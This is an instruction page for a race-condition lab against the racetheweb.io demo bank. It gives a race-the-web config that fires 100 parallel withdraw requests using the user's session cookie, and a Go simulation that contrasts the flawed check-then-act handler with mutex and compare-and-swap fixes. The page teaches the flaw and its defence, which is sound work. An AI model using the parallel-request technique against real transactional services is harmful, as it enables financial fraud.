Instructions

  1. Click "Initialize" to initialize a bank account with $10,000.
  2. Withdraw money from your account, observe that your account balance is updated, and that you have received the amount requested.
  3. Repeat the request with race-the-web. Your config file should look like the following:

     # Send the same request 100 times in parallel
     count = 100
     verbose = true
     [[requests]]
         method = "POST"
         url = "http://racetheweb.io/bank/withdraw"
         # Withdraw 1 dollar
         body = "amount=1"
         # Insert your sessionId cookie below.
         cookies = ["sessionId=<insert here>"]
         redirects = false

  4. Visit the bank page again in your browser to view your updated balance. Note that the total should be $100 less ($1 * 100 requests) than it was after your original withdrawal. However, due to a race condition flaw in the application, your balance will be much higher than that, yet you will have received the money from the bank in every withdrawal.
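The behaviour in step 4 is a check-then-act race: each request reads the balance, checks it, and only later writes the debit back, so 100 parallel requests can all pass the check against the same stale value. The Go program below is an added example written for this page, not the racetheweb.io application's code, and simulates that flaw in-process: the `Account` type, the `checkToActLatency` delay and the `Simulate` driver are constructed for the demonstration. It runs the same 100 one-dollar withdrawals against a vulnerable handler and against two fixed ones (a mutex-protected critical section, and a compare-and-swap loop that gives the same guarantee as a conditional `UPDATE ... WHERE balance >= ?`), and checks the ledger invariant `balance + paidOut == start` that the race breaks.

```go
package main

import (
	"errors"
	"fmt"
	"sync"
	"sync/atomic"
	"time"
)

// Account is a stand-in for the demo's bank account (constructed for this
// example; not the racetheweb.io implementation). Balances are whole dollars.
type Account struct {
	balance int64 // first field: keeps it 64-bit aligned for sync/atomic
	paidOut int64 // dollars actually handed to callers, summed for verification
	mu      sync.Mutex
}

var ErrInsufficient = errors.New("insufficient funds")

// checkToActLatency models the gap between reading the balance and writing it
// back in a real handler (database round trip, template rendering). It is what
// lets many parallel requests all see the same stale balance.
const checkToActLatency = 2 * time.Millisecond

// WithdrawRacy is the check-then-act pattern the demo exploits. Every single
// read and write is atomic, yet the check and the debit are not one unit, so
// every concurrent request passes the check against the same balance.
func WithdrawRacy(a *Account, amount int64) error {
	current := atomic.LoadInt64(&a.balance) // check
	if current < amount {
		return ErrInsufficient
	}
	time.Sleep(checkToActLatency)
	atomic.StoreInt64(&a.balance, current-amount) // act, from the stale read
	atomic.AddInt64(&a.paidOut, amount)
	return nil
}

// WithdrawLocked makes check and debit one critical section, the in-process
// equivalent of SELECT ... FOR UPDATE inside a transaction.
func WithdrawLocked(a *Account, amount int64) error {
	a.mu.Lock()
	defer a.mu.Unlock()
	if a.balance < amount {
		return ErrInsufficient
	}
	time.Sleep(checkToActLatency)
	a.balance -= amount
	atomic.AddInt64(&a.paidOut, amount)
	return nil
}

// WithdrawCAS is the optimistic form: it retries until the debit applies to
// exactly the balance it checked, the same guarantee a conditional SQL update
// (UPDATE accounts SET balance = balance - ? WHERE balance >= ?) gives.
func WithdrawCAS(a *Account, amount int64) error {
	for {
		current := atomic.LoadInt64(&a.balance)
		if current < amount {
			return ErrInsufficient
		}
		if atomic.CompareAndSwapInt64(&a.balance, current, current-amount) {
			atomic.AddInt64(&a.paidOut, amount)
			return nil
		}
		// balance changed between check and act: re-check from the new value
	}
}

// Simulate releases n concurrent withdrawals of amount at once against a fresh
// account holding start dollars, and returns the final balance and the total
// paid out. In a consistent ledger balance + paidOut == start.
func Simulate(start, amount int64, n int, withdraw func(*Account, int64) error) (balance, paidOut int64) {
	acct := &Account{balance: start}
	gate := make(chan struct{})
	var wg sync.WaitGroup
	for i := 0; i < n; i++ {
		wg.Add(1)
		go func() {
			defer wg.Done()
			<-gate // all goroutines start together, like race-the-web's parallel requests
			_ = withdraw(acct, amount)
		}()
	}
	close(gate)
	wg.Wait()
	return atomic.LoadInt64(&acct.balance), atomic.LoadInt64(&acct.paidOut)
}

func main() {
	strategies := map[string]func(*Account, int64) error{
		"racy": WithdrawRacy, "locked": WithdrawLocked, "cas": WithdrawCAS,
	}
	for name, w := range strategies {
		bal, paid := Simulate(10000, 1, 100, w)
		fmt.Printf("%-7s balance=%d paidOut=%d ledgerConsistent=%v\n",
			name, bal, paid, bal+paid == 10000)
	}
}
```

The racy run reproduces what step 4 describes: all 100 requests are paid, but the recorded balance drops by only a dollar or two. The lesson for the fix is in the comparison between `WithdrawRacy` and `WithdrawCAS`: making each read and write atomic changes nothing, because the vulnerability is that the check and the update are separate operations. Either the whole check-and-debit runs under one lock or transaction, or the update itself must re-assert the precondition (the compare-and-swap, or a conditional `UPDATE` whose affected-row count is checked).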

Aaron Hnatiw 2017